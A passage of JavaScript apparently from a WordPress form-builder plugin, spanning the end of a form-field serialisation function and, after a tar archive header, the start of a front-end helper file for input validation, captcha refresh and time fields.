							if(document.getElementById(id+"_label_element"+idi).getAttribute('where'))
								w_choices_params[tt]=document.getElementById(id+"_label_element"+idi).getAttribute('where')+'[where_order_by]'+document.getElementById(id+"_label_element"+idi).getAttribute('order_by')+'[db_info]'+document.getElementById(id+"_label_element"+idi).getAttribute('db_info');
							else
								w_choices_params[tt]='';
							tt++;
							v=idi;
						}
					}
				}
			
			}

			if(document.getElementById(id+"_option_left_right"))
				w_field_option_pos = document.getElementById(id+"_option_left_right").value;
			else
				w_field_option_pos = 'left';
			
			w_value_disabled = document.getElementById(id+"_value_disabledform_id_temp").value;
	
			atrs=return_attributes(id+'_elementform_id_temp'+v);
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_field_option_pos+"*:*w_field_option_pos*:*";
			form_fields+=w_flow+"*:*w_flow*:*";
			form_fields+=w_choices.join('***')+"*:*w_choices*:*";
			form_fields+=w_choices_checked.join('***')+"*:*w_choices_checked*:*";
			form_fields+=w_rowcol+"*:*w_rowcol*:*";
			form_fields+=w_required+"*:*w_required*:*";
			form_fields+=w_randomize+"*:*w_randomize*:*";
			form_fields+=w_allow_other+"*:*w_allow_other*:*";
			form_fields+=w_allow_other_num+"*:*w_allow_other_num*:*";
			form_fields+=w_value_disabled+"*:*w_value_disabled*:*";
			form_fields+=w_choices_value.join('***')+"*:*w_choices_value*:*";
			form_fields+=w_choices_params.join('***')+"*:*w_choices_params*:*";
			form_fields+=w_class+"*:*w_class*:*";
				
				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				
				form_fields+="*:*new_field*:*";	
				break;
			}
		
		
		
		case 'type_star_rating':
		{
			w_star_amount  = document.getElementById(id+"_star_amountform_id_temp").value;
			w_field_label_col  = document.getElementById(id+"_star_colorform_id_temp").value;
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_field_label_col+"*:*w_field_label_col*:*";
			form_fields+=w_star_amount+"*:*w_star_amount*:*";
			form_fields+=w_required+"*:*w_required*:*";
			form_fields+=w_class+"*:*w_class*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;
				
		}
			
		case 'type_scale_rating':
		{
		
			w_mini_labels  =[document.getElementById(id+"_mini_label_worst").innerHTML,document.getElementById(id+"_mini_label_best").innerHTML];	
			
			w_scale_amount = document.getElementById(id+"_scale_amountform_id_temp").value;
				
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
				
						
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_mini_labels.join('***')+"*:*w_mini_labels*:*";
			form_fields+=w_scale_amount+"*:*w_scale_amount*:*";
			form_fields+=w_required+"*:*w_required*:*";
			form_fields+=w_class+"*:*w_class*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;
				
		}
		
		case 'type_spinner':
		{
		
			w_field_min_value  = document.getElementById(id+"_min_valueform_id_temp").value;
			w_field_max_value  = document.getElementById(id+"_max_valueform_id_temp").value;
			w_field_width  = document.getElementById(id+"_spinner_widthform_id_temp").value;
			w_field_step = document.getElementById(id+"_stepform_id_temp").value;
			w_field_value  = document.getElementById(id+"_elementform_id_temp").getAttribute("aria-valuenow");
				
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
							
									
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_field_width+"*:*w_field_width*:*";
			form_fields+=w_field_min_value+"*:*w_field_min_value*:*";
			form_fields+=w_field_max_value+"*:*w_field_max_value*:*";
			form_fields+=w_field_step+"*:*w_field_step*:*";
			form_fields+=w_field_value+"*:*w_field_value*:*";
			form_fields+=w_required+"*:*w_required*:*";
			form_fields+=w_class+"*:*w_class*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;
				
		}
		case 'type_slider':
		{
			
			w_field_min_value  = document.getElementById(id+"_slider_min_valueform_id_temp").value;
			w_field_max_value  = document.getElementById(id+"_slider_max_valueform_id_temp").value;
			w_field_width  = document.getElementById(id+"_slider_widthform_id_temp").value;
			w_field_value  = document.getElementById(id+"_slider_valueform_id_temp").value;
				
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			
			
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_field_width+"*:*w_field_width*:*";
			form_fields+=w_field_min_value+"*:*w_field_min_value*:*";
			form_fields+=w_field_max_value+"*:*w_field_max_value*:*";
			form_fields+=w_field_value+"*:*w_field_value*:*";
			form_fields+=w_required+"*:*w_required*:*";
			form_fields+=w_class+"*:*w_class*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;
				
		}
			
		case 'type_range':
		{
		
				w_field_range_width  = document.getElementById(id+"_range_widthform_id_temp").value;
				w_field_range_step = document.getElementById(id+"_range_stepform_id_temp").value;
				
				w_field_value1  = document.getElementById(id+"_elementform_id_temp0").getAttribute("aria-valuenow");
				w_field_value2  = document.getElementById(id+"_elementform_id_temp1").getAttribute("aria-valuenow");
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				w_mini_labels = [document.getElementById(id+"_mini_label_from").innerHTML,document.getElementById(id+"_mini_label_to").innerHTML]; 	 
				
													
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_field_range_width+"*:*w_field_range_width*:*";
			form_fields+=w_field_range_step+"*:*w_field_range_step*:*";
			form_fields+=w_field_value1+"*:*w_field_value1*:*";
			form_fields+=w_field_value2+"*:*w_field_value2*:*";
			form_fields+=w_mini_labels.join('***')+"*:*w_mini_labels*:*";
			form_fields+=w_required+"*:*w_required*:*";
			form_fields+=w_class+"*:*w_class*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;
				
		}
		case 'type_grading':
		{
				w_total = document.getElementById(id+"_grading_totalform_id_temp").value;
				w_items=[];
				
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp"+k))
					{
						
						w_items.push(document.getElementById(id+"_label_elementform_id_temp"+k).innerHTML);
						
					}
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
		
				form_fields+=w_field_label+"*:*w_field_label*:*";
				form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
				form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
				form_fields+=w_items.join('***')+"*:*w_items*:*";
				form_fields+=w_total+"*:*w_total*:*";
				form_fields+=w_required+"*:*w_required*:*";
				form_fields+=w_class+"*:*w_class*:*";
				
				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				
				form_fields+="*:*new_field*:*";	
				break;
		}
		case 'type_matrix':
		{
				w_rows=[];
				w_rows[0]="";
				
				for(k=1;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp"+k+"_0"))
					{
						
						w_rows.push(document.getElementById(id+"_label_elementform_id_temp"+k+"_0").innerHTML);
						
					}
			
			    w_columns=[];
				w_columns[0]="";
				for(k=1;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp0_"+k))
					{
						
						w_columns.push(document.getElementById(id+"_label_elementform_id_temp0_"+k).innerHTML);
						
					}
					
				w_field_input_type = document.getElementById(id+"_input_typeform_id_temp").value;		
				w_textbox_size = document.getElementById(id+"_textbox_sizeform_id_temp") ? document.getElementById(id+"_textbox_sizeform_id_temp").value : '100';	
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
			
							
				form_fields+=w_field_label+"*:*w_field_label*:*";
				form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
				form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
				form_fields+=w_field_input_type+"*:*w_field_input_type*:*";
				form_fields+=w_rows.join('***')+"*:*w_rows*:*";
				form_fields+=w_columns.join('***')+"*:*w_columns*:*";
				form_fields+=w_required+"*:*w_required*:*";
				form_fields+=w_class+"*:*w_class*:*";
				
				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				form_fields+=w_textbox_size+"*:*w_textbox_size*:*";
				form_fields+="*:*new_field*:*";	
				break;
		}
		case 'type_time':
		{	
			atrs=return_attributes(id+'_hhform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			w_hh=document.getElementById(id+'_hhform_id_temp').value;
			w_mm=document.getElementById(id+'_mmform_id_temp').value;
			if(document.getElementById(id+'_ssform_id_temp'))
			{
				w_ss=document.getElementById(id+'_ssform_id_temp').value;
				w_sec="1";
				w_sec_label=document.getElementById(id+'_mini_label_ss').innerHTML;
			}
			else
			{
				w_ss="";
				w_sec="0";
				w_sec_label='SS';
			}
			if(document.getElementById(id+'_am_pm_select'))
			{
				w_am_pm=document.getElementById(id+'_am_pmform_id_temp').value;
				w_time_type="12";
				w_mini_labels = [document.getElementById(id+'_mini_label_hh').innerHTML, document.getElementById(id+'_mini_label_mm').innerHTML, w_sec_label, document.getElementById(id+'_mini_label_am_pm').innerHTML];
			}
			else
			{
				w_am_pm=0;
				w_time_type="24";
				w_mini_labels = [document.getElementById(id+'_mini_label_hh').innerHTML, document.getElementById(id+'_mini_label_mm').innerHTML, w_sec_label, 'AM/PM'];
				
			}
				form_fields+=w_field_label+"*:*w_field_label*:*";
				form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
				form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
				form_fields+=w_time_type+"*:*w_time_type*:*";
				form_fields+=w_am_pm+"*:*w_am_pm*:*";
				form_fields+=w_sec+"*:*w_sec*:*";
				form_fields+=w_hh+"*:*w_hh*:*";
				form_fields+=w_mm+"*:*w_mm*:*";
				form_fields+=w_ss+"*:*w_ss*:*";
				form_fields+=w_mini_labels.join('***')+"*:*w_mini_labels*:*";
				form_fields+=w_required+"*:*w_required*:*";
				form_fields+=w_class+"*:*w_class*:*";
				
				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				form_fields+="*:*new_field*:*";	



			 break;
		}
		case 'type_date':
		{	
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			w_date=document.getElementById(id+'_elementform_id_temp').value;
			w_format=document.getElementById(id+'_buttonform_id_temp').getAttribute("format");
			w_but_val=document.getElementById(id+'_buttonform_id_temp').value;
			w_disable_past_days = document.getElementById(id+'_dis_past_daysform_id_temp') ? document.getElementById(id+'_dis_past_daysform_id_temp').value : 'no';
			
				form_fields+=w_field_label+"*:*w_field_label*:*";
				form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
				form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
				form_fields+=w_date+"*:*w_date*:*";
				form_fields+=w_required+"*:*w_required*:*";
				form_fields+=w_class+"*:*w_class*:*";
				form_fields+=w_format+"*:*w_format*:*";
				form_fields+=w_but_val+"*:*w_but_val*:*";
				
				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				form_fields+=w_disable_past_days+"*:*w_disable_past_days*:*";
				form_fields+="*:*new_field*:*";	
			 break;
		}
		case 'type_date_fields':
		{	
			atrs			=return_attributes(id+'_dayform_id_temp');
			w_attr_name		=atrs[0];
			w_attr_value	=atrs[1];
			w_day			=document.getElementById(id+'_dayform_id_temp').value;
			w_month			=document.getElementById(id+'_monthform_id_temp').value;
			w_year			=document.getElementById(id+'_yearform_id_temp').value;
			w_day_type		=document.getElementById(id+'_dayform_id_temp').tagName;
			w_month_type	=document.getElementById(id+'_monthform_id_temp').tagName;
			w_year_type		=document.getElementById(id+'_yearform_id_temp').tagName;
			w_day_label		=document.getElementById(id+'_day_label').innerHTML;
			w_month_label	=document.getElementById(id+'_month_label').innerHTML;
			w_year_label	=document.getElementById(id+'_year_label').innerHTML;
			
			s				=document.getElementById(id+'_dayform_id_temp').style.width;
			w_day_size		=s.substring(0,s.length-2);
			
			s				=document.getElementById(id+'_monthform_id_temp').style.width;
			w_month_size	=s.substring(0,s.length-2);
			
			s				=document.getElementById(id+'_yearform_id_temp').style.width;
			w_year_size		=s.substring(0,s.length-2);

      w_from			=document.getElementById(id+'_yearform_id_temp').getAttribute('from');
      w_to			=document.getElementById(id+'_yearform_id_temp').getAttribute('to');
			
			w_divider		=document.getElementById(id+'_separator1').innerHTML;

				form_fields+=w_field_label+"*:*w_field_label*:*";
				form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
				form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
				form_fields+=w_day+"*:*w_day*:*";
				form_fields+=w_month+"*:*w_month*:*";
				form_fields+=w_year+"*:*w_year*:*";
				form_fields+=w_day_type+"*:*w_day_type*:*";
				form_fields+=w_month_type+"*:*w_month_type*:*";
				form_fields+=w_year_type+"*:*w_year_type*:*";
				form_fields+=w_day_label+"*:*w_day_label*:*";
				form_fields+=w_month_label+"*:*w_month_label*:*";
				form_fields+=w_year_label+"*:*w_year_label*:*";
				form_fields+=w_day_size+"*:*w_day_size*:*";
				form_fields+=w_month_size+"*:*w_month_size*:*";
				form_fields+=w_year_size+"*:*w_year_size*:*";
				form_fields+=w_required+"*:*w_required*:*";
				form_fields+=w_class+"*:*w_class*:*";
				form_fields+=w_from+"*:*w_from*:*";
				form_fields+=w_to+"*:*w_to*:*";
				form_fields+=w_divider+"*:*w_divider*:*";

				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				form_fields+="*:*new_field*:*";	
				break;


		}
		case 'type_own_select':
		{	
			tt=0;
			jQuery('#'+id+'_elementform_id_temp option').each(function() {
				w_choices[tt]=jQuery(this).html();
				w_choices_value[tt]=jQuery(this).val();
				w_choices_checked[tt]=jQuery(this)[0].selected;
				if(jQuery(this).attr('where'))
					w_choices_params[tt]=jQuery(this).attr('where')+'[where_order_by]'+jQuery(this).attr('order_by')+'[db_info]'+jQuery(this).attr('db_info');
				else
					w_choices_params[tt]='';
					
				if(jQuery(this).val())
					w_choices_disabled[tt]=false;	
				else
					w_choices_disabled[tt]=true;
					
				tt++;		
			});

			w_value_disabled = document.getElementById(id+'_value_disabledform_id_temp').value;
			
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];


				form_fields+=w_field_label+"*:*w_field_label*:*";
				form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
				form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
				form_fields+=w_size+"*:*w_size*:*";
				form_fields+=w_choices.join('***')+"*:*w_choices*:*";
				form_fields+=w_choices_checked.join('***')+"*:*w_choices_checked*:*";
				form_fields+=w_choices_disabled.join('***')+"*:*w_choices_disabled*:*";
				form_fields+=w_required+"*:*w_required*:*";
				form_fields+=w_value_disabled+"*:*w_value_disabled*:*";
				form_fields+=w_choices_value.join('***')+"*:*w_choices_value*:*";
				form_fields+=w_choices_params.join('***')+"*:*w_choices_params*:*";
				form_fields+=w_class+"*:*w_class*:*";
				
				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				form_fields+="*:*new_field*:*";	
				break;


		}
		

		case 'type_country':
		{	
			w_countries=[];

			select_=document.getElementById(id+'_elementform_id_temp');
			k=select_.childNodes.length;
			for(j=0; j<k; j++)
			{
				w_countries.push(select_.childNodes[j].value);
			}

			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];

				form_fields+=w_field_label+"*:*w_field_label*:*";
				form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
				form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
				form_fields+=w_size+"*:*w_size*:*";
				form_fields+=w_countries.join('***')+"*:*w_countries*:*";
				form_fields+=w_required+"*:*w_required*:*";
				form_fields+=w_class+"*:*w_class*:*";
				
				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				form_fields+="*:*new_field*:*";	
				break;


		}
		case 'type_captcha':
		{
			w_digit=document.getElementById("_wd_captchaform_id_temp").getAttribute("digit");
			atrs=return_attributes('_wd_captchaform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			
			
				form_fields+=w_field_label+"*:*w_field_label*:*";
				form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
				form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
				form_fields+=w_digit+"*:*w_digit*:*";
				form_fields+=w_class+"*:*w_class*:*";
				
				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				form_fields+="*:*new_field*:*";	
				break;

		}
		case 'type_arithmetic_captcha':
		{
			w_count = document.getElementById("_wd_arithmetic_captchaform_id_temp").getAttribute("operations_count");
			w_operations = document.getElementById("_wd_arithmetic_captchaform_id_temp").getAttribute("operations");
			w_input_size = document.getElementById("_wd_arithmetic_captchaform_id_temp").getAttribute("input_size");
			atrs=return_attributes('_wd_captchaform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_count+"*:*w_count*:*";
			form_fields+=w_operations+"*:*w_operations*:*";
			form_fields+=w_class+"*:*w_class*:*";
			form_fields+=w_input_size+"*:*w_input_size*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
			form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;

		}
		case 'type_recaptcha':
		{
			w_public  = document.getElementById("wd_recaptchaform_id_temp").getAttribute("public_key");
			w_private  = document.getElementById("wd_recaptchaform_id_temp").getAttribute("private_key");
			w_theme  = document.getElementById("wd_recaptchaform_id_temp").getAttribute("theme");
			
			atrs=return_attributes('wd_recaptchaform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_public+"*:*w_public*:*";
			form_fields+=w_private+"*:*w_private*:*";
			form_fields+=w_theme+"*:*w_theme*:*";
			form_fields+=w_class+"*:*w_class*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
			form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			document.getElementById("public_key").value = document.getElementById("wd_recaptchaform_id_temp").getAttribute("public_key");
			document.getElementById("private_key").value= document.getElementById("wd_recaptchaform_id_temp").getAttribute("private_key");

			break;

		}
		case 'type_map':
		{
			w_lat=[];
			w_long=[];
			w_info=[];
			
			w_center_x  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_x");
			w_center_y  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_y");
			w_zoom  = document.getElementById(id+"_elementform_id_temp").getAttribute("zoom");
			w_width = parseInt(document.getElementById(id+"_elementform_id_temp").style.width);
			w_height= parseInt(document.getElementById(id+"_elementform_id_temp").style.height);
			
			
			
			for(j=0; j<=20; j++)
				if( document.getElementById(id+"_elementform_id_temp").getAttribute("lat"+j))
				{
					w_lat.push(document.getElementById(id+"_elementform_id_temp").getAttribute("lat"+j));
					w_long.push(document.getElementById(id+"_elementform_id_temp").getAttribute("long"+j));
					w_info.push(document.getElementById(id+"_elementform_id_temp").getAttribute("info"+j));
				}

			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];


				form_fields+=w_field_label+"*:*w_field_label*:*";
				form_fields+=w_center_x+"*:*w_center_x*:*";
				form_fields+=w_center_y+"*:*w_center_y*:*";
				form_fields+=w_long.join('***')+"*:*w_long*:*";
				form_fields+=w_lat.join('***')+"*:*w_lat*:*";
				form_fields+=w_zoom+"*:*w_zoom*:*";
				form_fields+=w_width+"*:*w_width*:*";
				form_fields+=w_height+"*:*w_height*:*";
				form_fields+=w_info.join('***')+"*:*w_info*:*";
				form_fields+=w_class+"*:*w_class*:*";
				
				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				form_fields+="*:*new_field*:*";	
				break;


		}
		
		case 'type_mark_map':
		{
			w_info  = document.getElementById(id+"_elementform_id_temp").getAttribute("info0");
			w_long  = document.getElementById(id+"_elementform_id_temp").getAttribute("long0");
			w_lat   = document.getElementById(id+"_elementform_id_temp").getAttribute("lat0");
			w_zoom  = document.getElementById(id+"_elementform_id_temp").getAttribute("zoom");
			w_width = parseInt(document.getElementById(id+"_elementform_id_temp").style.width);
			w_height= parseInt(document.getElementById(id+"_elementform_id_temp").style.height);
			w_center_x  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_x");
			w_center_y  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_y");
			
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];

			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_center_x+"*:*w_center_x*:*";
			form_fields+=w_center_y+"*:*w_center_y*:*";
			form_fields+=w_long+"*:*w_long*:*";
			form_fields+=w_lat+"*:*w_lat*:*";
			form_fields+=w_zoom+"*:*w_zoom*:*";
			form_fields+=w_width+"*:*w_width*:*";
			form_fields+=w_height+"*:*w_height*:*";
			form_fields+=w_info+"*:*w_info*:*";
			form_fields+=w_class+"*:*w_class*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
			form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;
		}
		case 'type_submit_reset':
		{
			atrs=return_attributes(id+'_element_submitform_id_temp');
			w_act=!(document.getElementById(id+"_element_resetform_id_temp").style.display=="none");
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			w_submit_title = document.getElementById(id+"_element_submitform_id_temp").value;
			w_reset_title  = document.getElementById(id+"_element_resetform_id_temp").value;
			
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_submit_title+"*:*w_submit_title*:*";
			form_fields+=w_reset_title+"*:*w_reset_title*:*";
			form_fields+=w_class+"*:*w_class*:*";
			form_fields+=w_act+"*:*w_act*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
			form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;
		}

		case 'type_button':
		{
			w_title	=new Array();	
		
			w_func	=new Array();
			tt=0;
			v=0;
			for(k=0;k<100;k++)
				if(document.getElementById(id+"_elementform_id_temp"+k))
				{
					w_title[tt]=document.getElementById(id+"_elementform_id_temp"+k).value;
					w_func[tt]=document.getElementById(id+"_elementform_id_temp"+k).getAttribute("onclick");
					tt++;
					v=k;
				}
			atrs=return_attributes(id+'_elementform_id_temp'+v);
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];

			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_title.join('***')+"*:*w_title*:*";
			form_fields+=w_func.join('***')+"*:*w_func*:*";
			form_fields+=w_class+"*:*w_class*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
			form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;
		}
		case 'type_hidden':
		{
			w_value  = document.getElementById(id+"_elementform_id_temp").value;
			w_name  = document.getElementById(id+"_elementform_id_temp").name;
			
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			
			form_fields+=w_name+"*:*w_field_label*:*";
			form_fields+=w_name+"*:*w_name*:*";
			form_fields+=w_value+"*:*w_value*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
			form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;
		}
	}
}js/main_front_end.js000060400000174707152434416630010524 0ustar00F=2;
var c;
var a = new Array();
function show_other_input(num, form_id) {
  for (k=0;k<50;k++)
    if (document.getElementById(num+"_element"+form_id+k)) 
      if (document.getElementById(num+"_element"+form_id+k).getAttribute('other')) 
        if (document.getElementById(num+"_element"+form_id+k).getAttribute('other')==1) {
          var element_other = document.getElementById(num+"_element"+form_id+k);
          break;
        }
	var parent = element_other.parentNode;
	var br = document.createElement('br');
  br.setAttribute("id", num+"_other_br"+form_id);
	var el_other = document.createElement('input');
	el_other.setAttribute("id", num+"_other_input"+form_id);
	el_other.setAttribute("name", num+"_other_input"+form_id);
	el_other.setAttribute("type", "text");
	el_other.setAttribute("class", "other_input");
	parent.appendChild(br);
	parent.appendChild(el_other);
}

function set_sel_am_pm(select_) {
	if(select_.options[0].selected)	{
		select_.options[0].setAttribute("selected", "selected");
		select_.options[1].removeAttribute("selected");
	}
	else {
		select_.options[1].setAttribute("selected", "selected");
		select_.options[0].removeAttribute("selected");
	}
}

function check_isnum_point(e) {
  var chCode1 = e.which || e.keyCode;
  if (chCode1 == 46 || chCode1 == 45) {
    return true;
  }
	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57)) {
    return false;
  }
  return true;
}

function check_isnum(e)
{
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	return true;
}

function check_isnum_or_minus(e) {
  var chCode1 = e.which || e.keyCode;
  if (chCode1 != 45 ) {
    if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57)) {
      return false;
    }
	}
	return true;
}

function captcha_refresh(id, genid)
{
	if (document.getElementById(id+genid)) {
		srcArr=document.getElementById(id+genid).src.split("&r=");
		document.getElementById(id+genid).src=srcArr[0]+'&r='+Math.floor(Math.random()*100);
		document.getElementById(id+"_input"+genid).value='';
		document.getElementById(id+genid).style.display="block";
	}
	else {
		srcArr=document.getElementById(id).src.split("&r=");
		document.getElementById(id).src=srcArr[0]+'&r='+Math.floor(Math.random()*100);
		document.getElementById(id+"_input").value='';
		document.getElementById(id).style.display="block";
	}
}

function set_checked(id,j,form_id)
{
checking=document.getElementById(id+"_element"+form_id+j);
if(checking.getAttribute('other'))
if(checking.getAttribute('other')==1)
if(!checking.checked)
{	
if(document.getElementById(id+"_other_input"+form_id))
{
document.getElementById(id+"_other_input"+form_id).parentNode.removeChild(document.getElementById(id+"_other_br"+form_id));
document.getElementById(id+"_other_input"+form_id).parentNode.removeChild(document.getElementById(id+"_other_input"+form_id));
}
return false;	
}
return true;
}

function set_select(value) {
  var value = value.id.split("_element");
  id = value[0];
  form_id = value[1];
  set_total_value(id,form_id);
}

function set_default(id, j, form_id){	
  set_total_value(id,form_id);
}

function add_0(id)
{
	input=document.getElementById(id);
	if(input.value.length==1)
	{
		input.value='0'+input.value;
		input.setAttribute("value", input.value);
	}
}

function change_hour(ev, id,hour_interval)
{
	if(check_hour(ev, id,hour_interval))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_minute(ev, id)
{
	if(check_minute(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_second(ev, id)
{
	if(check_second(ev, id))
	{
